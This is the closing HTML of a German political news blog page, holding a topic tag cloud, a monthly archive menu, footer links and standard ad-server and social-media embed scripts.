<a href="https://www.politikexpress.de/thema/beruf" class="tag-cloud-link tag-link-166 tag-link-position-11" style="font-size: 11.04347826087pt;" aria-label="beruf (2.596 Einträge)">beruf</a>
<a href="https://www.politikexpress.de/thema/celebrities" class="tag-cloud-link tag-link-1655 tag-link-position-12" style="font-size: 8.6086956521739pt;" aria-label="celebrities (1.132 Einträge)">celebrities</a>
<a href="https://www.politikexpress.de/thema/energie" class="tag-cloud-link tag-link-39 tag-link-position-13" style="font-size: 10.434782608696pt;" aria-label="energie (2.073 Einträge)">energie</a>
<a href="https://www.politikexpress.de/thema/fachanwalt" class="tag-cloud-link tag-link-729 tag-link-position-14" style="font-size: 8.8792270531401pt;" aria-label="fachanwalt (1.226 Einträge)">fachanwalt</a>
<a href="https://www.politikexpress.de/thema/familie" class="tag-cloud-link tag-link-150 tag-link-position-15" style="font-size: 9.8937198067633pt;" aria-label="familie (1.746 Einträge)">familie</a>
<a href="https://www.politikexpress.de/thema/fernsehen" class="tag-cloud-link tag-link-16 tag-link-position-16" style="font-size: 13.816425120773pt;" aria-label="fernsehen (6.578 Einträge)">fernsehen</a>
<a href="https://www.politikexpress.de/thema/finanzen" class="tag-cloud-link tag-link-28 tag-link-position-17" style="font-size: 9.3526570048309pt;" aria-label="finanzen (1.442 Einträge)">finanzen</a>
<a href="https://www.politikexpress.de/thema/fluchtling" class="tag-cloud-link tag-link-16462 tag-link-position-18" style="font-size: 9.1497584541063pt;" aria-label="fluchtling (1.361 Einträge)">fluchtling</a>
<a href="https://www.politikexpress.de/thema/gesellschaft" class="tag-cloud-link tag-link-107 tag-link-position-19" style="font-size: 12.937198067633pt;" aria-label="gesellschaft (4.891 Einträge)">gesellschaft</a>
<a href="https://www.politikexpress.de/thema/gesundheit" class="tag-cloud-link tag-link-36 tag-link-position-20" style="font-size: 13.613526570048pt;" aria-label="gesundheit (6.198 Einträge)">gesundheit</a>
<a href="https://www.politikexpress.de/thema/gesundheitspolitik" class="tag-cloud-link tag-link-105 tag-link-position-21" style="font-size: 10.231884057971pt;" aria-label="gesundheitspolitik (1.951 Einträge)">gesundheitspolitik</a>
<a href="https://www.politikexpress.de/thema/hilfsorganisation" class="tag-cloud-link tag-link-66 tag-link-position-22" style="font-size: 11.51690821256pt;" aria-label="hilfsorganisation (3.002 Einträge)">hilfsorganisation</a>
<a href="https://www.politikexpress.de/thema/internet" class="tag-cloud-link tag-link-124 tag-link-position-23" style="font-size: 11.314009661836pt;" aria-label="internet (2.811 Einträge)">internet</a>
<a href="https://www.politikexpress.de/thema/jugendlicher" class="tag-cloud-link tag-link-138 tag-link-position-24" style="font-size: 8.2705314009662pt;" aria-label="jugendlicher (997 Einträge)">jugendlicher</a>
<a href="https://www.politikexpress.de/thema/konflikte" class="tag-cloud-link tag-link-329 tag-link-position-25" style="font-size: 8.0676328502415pt;" aria-label="konflikte (924 Einträge)">konflikte</a>
<a href="https://www.politikexpress.de/thema/medien" class="tag-cloud-link tag-link-20 tag-link-position-26" style="font-size: 13.68115942029pt;" aria-label="medien (6.342 Einträge)">medien</a>
<a href="https://www.politikexpress.de/thema/partei" class="tag-cloud-link tag-link-34 tag-link-position-27" style="font-size: 15.43961352657pt;" aria-label="partei (11.522 Einträge)">partei</a>
<a href="https://www.politikexpress.de/thema/personalien" class="tag-cloud-link tag-link-43 tag-link-position-28" style="font-size: 9.3526570048309pt;" aria-label="personalien (1.461 Einträge)">personalien</a>
<a href="https://www.politikexpress.de/thema/politik" class="tag-cloud-link tag-link-19 tag-link-position-29" style="font-size: 22pt;" aria-label="politik (107.254 Einträge)">politik</a>
<a href="https://www.politikexpress.de/thema/presse" class="tag-cloud-link tag-link-23 tag-link-position-30" style="font-size: 8.743961352657pt;" aria-label="presse (1.182 Einträge)">presse</a>
<a href="https://www.politikexpress.de/thema/ratgeber" class="tag-cloud-link tag-link-176 tag-link-position-31" style="font-size: 9.8260869565217pt;" aria-label="ratgeber (1.712 Einträge)">ratgeber</a>
<a href="https://www.politikexpress.de/thema/rechtsanw-lte" class="tag-cloud-link tag-link-688 tag-link-position-32" style="font-size: 10.231884057971pt;" aria-label="rechtsanw-lte (1.933 Einträge)">rechtsanw-lte</a>
<a href="https://www.politikexpress.de/thema/rechtsanwalt" class="tag-cloud-link tag-link-686 tag-link-position-33" style="font-size: 11.314009661836pt;" aria-label="rechtsanwalt (2.816 Einträge)">rechtsanwalt</a>
<a href="https://www.politikexpress.de/thema/rechtsprechung" class="tag-cloud-link tag-link-51 tag-link-position-34" style="font-size: 9.7584541062802pt;" aria-label="rechtsprechung (1.644 Einträge)">rechtsprechung</a>
<a href="https://www.politikexpress.de/thema/religion" class="tag-cloud-link tag-link-152 tag-link-position-35" style="font-size: 8.743961352657pt;" aria-label="religion (1.164 Einträge)">religion</a>
<a href="https://www.politikexpress.de/thema/steuern" class="tag-cloud-link tag-link-113 tag-link-position-36" style="font-size: 8.0676328502415pt;" aria-label="steuern (933 Einträge)">steuern</a>
<a href="https://www.politikexpress.de/thema/terrorismus" class="tag-cloud-link tag-link-131 tag-link-position-37" style="font-size: 10.164251207729pt;" aria-label="terrorismus (1.883 Einträge)">terrorismus</a>
<a href="https://www.politikexpress.de/thema/umwelt" class="tag-cloud-link tag-link-17 tag-link-position-38" style="font-size: 11.178743961353pt;" aria-label="umwelt (2.703 Einträge)">umwelt</a>
<a href="https://www.politikexpress.de/thema/unternehmen" class="tag-cloud-link tag-link-115 tag-link-position-39" style="font-size: 11.178743961353pt;" aria-label="unternehmen (2.701 Einträge)">unternehmen</a>
<a href="https://www.politikexpress.de/thema/verbraucher" class="tag-cloud-link tag-link-26 tag-link-position-40" style="font-size: 11.652173913043pt;" aria-label="verbraucher (3.154 Einträge)">verbraucher</a>
<a href="https://www.politikexpress.de/thema/verkehr" class="tag-cloud-link tag-link-64 tag-link-position-41" style="font-size: 9.3526570048309pt;" aria-label="verkehr (1.436 Einträge)">verkehr</a>
<a href="https://www.politikexpress.de/thema/verlag" class="tag-cloud-link tag-link-175 tag-link-position-42" style="font-size: 9.1497584541063pt;" aria-label="verlag (1.359 Einträge)">verlag</a>
<a href="https://www.politikexpress.de/thema/versicherung" class="tag-cloud-link tag-link-111 tag-link-position-43" style="font-size: 9.9613526570048pt;" aria-label="versicherung (1.776 Einträge)">versicherung</a>
<a href="https://www.politikexpress.de/thema/wirtschaft" class="tag-cloud-link tag-link-18 tag-link-position-44" style="font-size: 12.734299516908pt;" aria-label="wirtschaft (4.619 Einträge)">wirtschaft</a>
<a href="https://www.politikexpress.de/thema/wissenschaft" class="tag-cloud-link tag-link-22 tag-link-position-45" style="font-size: 14.357487922705pt;" aria-label="wissenschaft (7.907 Einträge)">wissenschaft</a></div>
</div></div>
<div id="archives-3" class="widget widget_archive"><div class="widgetinner"><h3 class="widgettitle">Archiv</h3>
		<label class="screen-reader-text" for="archives-dropdown-3">Archiv</label>
		<select id="archives-dropdown-3" name="archive-dropdown" onchange='document.location.href=this.options[this.selectedIndex].value;'>
			
			<option value="">Monat auswählen</option>
				<option value='https://www.politikexpress.de/date/2018/09'> September 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/08'> August 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/07'> Juli 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/06'> Juni 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/05'> Mai 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/04'> April 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/03'> März 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/02'> Februar 2018 </option>
	<option value='https://www.politikexpress.de/date/2018/01'> Januar 2018 </option>
	<option value='https://www.politikexpress.de/date/2017/12'> Dezember 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/11'> November 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/10'> Oktober 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/09'> September 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/08'> August 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/07'> Juli 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/06'> Juni 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/05'> Mai 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/04'> April 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/03'> März 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/02'> Februar 2017 </option>
	<option value='https://www.politikexpress.de/date/2017/01'> Januar 2017 </option>
	<option value='https://www.politikexpress.de/date/2016/12'> Dezember 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/11'> November 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/10'> Oktober 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/09'> September 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/08'> August 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/07'> Juli 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/06'> Juni 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/05'> Mai 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/04'> April 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/03'> März 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/02'> Februar 2016 </option>
	<option value='https://www.politikexpress.de/date/2016/01'> Januar 2016 </option>
	<option value='https://www.politikexpress.de/date/2015/12'> Dezember 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/11'> November 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/10'> Oktober 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/09'> September 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/08'> August 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/07'> Juli 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/06'> Juni 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/05'> Mai 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/04'> April 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/03'> März 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/02'> Februar 2015 </option>
	<option value='https://www.politikexpress.de/date/2015/01'> Januar 2015 </option>
	<option value='https://www.politikexpress.de/date/2014/12'> Dezember 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/11'> November 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/10'> Oktober 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/09'> September 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/08'> August 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/07'> Juli 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/06'> Juni 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/05'> Mai 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/04'> April 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/03'> März 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/02'> Februar 2014 </option>
	<option value='https://www.politikexpress.de/date/2014/01'> Januar 2014 </option>
	<option value='https://www.politikexpress.de/date/2013/12'> Dezember 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/11'> November 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/10'> Oktober 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/09'> September 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/08'> August 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/07'> Juli 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/06'> Juni 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/05'> Mai 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/04'> April 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/03'> März 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/02'> Februar 2013 </option>
	<option value='https://www.politikexpress.de/date/2013/01'> Januar 2013 </option>
	<option value='https://www.politikexpress.de/date/2012/12'> Dezember 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/11'> November 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/10'> Oktober 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/09'> September 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/08'> August 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/07'> Juli 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/06'> Juni 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/05'> Mai 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/04'> April 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/03'> März 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/02'> Februar 2012 </option>
	<option value='https://www.politikexpress.de/date/2012/01'> Januar 2012 </option>
	<option value='https://www.politikexpress.de/date/2011/12'> Dezember 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/11'> November 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/10'> Oktober 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/09'> September 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/08'> August 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/07'> Juli 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/06'> Juni 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/05'> Mai 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/04'> April 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/03'> März 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/02'> Februar 2011 </option>
	<option value='https://www.politikexpress.de/date/2011/01'> Januar 2011 </option>
	<option value='https://www.politikexpress.de/date/2010/12'> Dezember 2010 </option>
	<option value='https://www.politikexpress.de/date/2010/11'> November 2010 </option>
	<option value='https://www.politikexpress.de/date/2010/10'> Oktober 2010 </option>

		</select>
		</div></div>
<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=892");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a5c432eb&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=892&amp;cb=%n&amp;n=a5c432eb&amp;ct0=%c' border='0' alt='' /></a></noscript>
 
	</div><!-- End of sidebar -->

	<div class="clear"></div>

<br /><br />
<center>

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=174");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a8c9f553&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=174&amp;cb=%n&amp;n=a8c9f553&amp;ct0=%c' border='0' alt='' /></a></noscript>

</center>

</div><!-- end of wrapper -->

<div id="footer">

	<div class="footerlist">
			<ul>
			<li><a href="https://www.politikexpress.de" title="Top News zu Politik und Gesellschaft">START</a></li>
			<li class="page_item page-item-2"><a href="https://www.politikexpress.de/impressum-html">Impressum</a></li>
<li class="page_item page-item-1611819"><a href="https://www.politikexpress.de/datenschutz">Datenschutz</a></li>
			<li class="last"><a href="https://www.politikexpress.de/feed" rel="nofollow" title="Neueste Artikel per RSS">RSS</a></li>			
		</ul>
		</div>
	
	
	
	<div class="clear"></div>
	
	<div id="footer-left-side">
					<a href="#top" title="PolitikExpress" rel="home"><strong>&uarr;</strong> PolitikExpress</a>
			</div><!-- #site-info -->
			
	<div id="footer-right-side">
		<a rel="nofollow" href="https://www.politikexpress.de/wp-login.php">Anmelden</a> - 
				<a rel="nofollow" href="http://wordpress.org/" title="Semantic Personal Publishing Platform" rel="generator">Powered by WordPress</a> - 
		Copyright by <a href="http://www.layermedia.eu/" title="LayerMedia">LayerMedia</a> 
		<span id="bruteprotect_uptime_check_string" style="display:none;">7ads6x98y</span><!-- Powered by WPtouch Pro: 3.7 -->
	<div id="fb-root"></div>
	<script type='text/javascript'>
	<!--
	(function(d, s, id) {
	  var js, fjs = d.getElementsByTagName(s)[0];
	  if (d.getElementById(id)) return;
	  js = d.createElement(s); js.id = id;
	  js.src = "//connect.facebook.net/de_DE/all.js#xfbml=1";
	  fjs.parentNode.insertBefore(js, fjs);
	}(document, 'script', 'facebook-jssdk'));
	// -->
	</script><script type='text/javascript' src='https://www.politikexpress.de/wp-includes/js/comment-reply.min.js?ver=4.9.8'></script>
<script type='text/javascript' src='https://www.politikexpress.de/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script>
<script async="async" type='text/javascript' src='https://www.politikexpress.de/wp-content/plugins/akismet/_inc/form.js?ver=4.0.8'></script>
	</div> <!-- #footer-right-side -->
	<div class="clear"></div>
</div><!-- /footer -->


<!--/* SkyScraper fixed */-->

<div style="position:fixed;left:995px;top:120px">

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=175");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a3012a5e&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=175&amp;cb=%n&amp;n=a3012a5e&amp;ct0=%c' border='0' alt='' /></a></noscript>

</div><!-- /SkyScraper -->	

<!--/* LayerAd */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=643");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a31408a7&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=643&amp;cb=%n&amp;n=a31408a7&amp;ct0=%c' border='0' alt='' /></a></noscript>


<!--/* PopUnder */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=644");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=a63b17f8&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=644&amp;cb=%n&amp;n=a63b17f8&amp;ct0=%c' border='0' alt='' /></a></noscript>


<!--/* PopUnder Valuebrand */-->

<script type='text/javascript'><!--//<![CDATA[
   document.MAX_ct0 = unescape('%c');

   var m3_u = (location.protocol=='https:'?'https://www.lmads.net/www/delivery/ajs.php':'http://www.lmads.net/www/delivery/ajs.php');
   var m3_r = Math.floor(Math.random()*99999999999);
   if (!document.MAX_used) document.MAX_used = ',';
   document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
   document.write ("?zoneid=645");
   document.write ('&amp;cb=' + m3_r);
   if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
   document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
   document.write ("&amp;loc=" + escape(window.location));
   if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
   if (document.context) document.write ("&context=" + escape(document.context));
   if ((typeof(document.MAX_ct0) != 'undefined') && (document.MAX_ct0.substring(0,4) == 'http')) {
       document.write ("&amp;ct0=" + escape(document.MAX_ct0));
   }
   if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
   document.write ("'><\/scr"+"ipt>");
//]]>--></script><noscript><a href='https://www.lmads.net/www/delivery/ck.php?n=af0fd89d&amp;cb=%n' target='_blank'><img src='https://www.lmads.net/www/delivery/avw.php?zoneid=645&amp;cb=%n&amp;n=af0fd89d&amp;ct0=%c' border='0' alt='' /></a></noscript>

<center>
<a rel="nofollow" href="https://www.topblogs.de/"><img border="0" src="https://www.topblogs.de/tracker.php?do=in&id=12923" alt="Blog Top Liste - by TopBlogs.de" /></a>
<a rel="nofollow" href="https://www.bloggerei.de/rubrik_2_Politikblogs" title="Blog-Verzeichnis"><img src="https://www.bloggerei.de/bgpublicon.jpg" width="80" height="15" border="0" alt="Blogverzeichnis - Blog Verzeichnis bloggerei.de" /></a>
</center>

</body>
</html><!-- hyper cache 2018-09-18 12:12:25 -->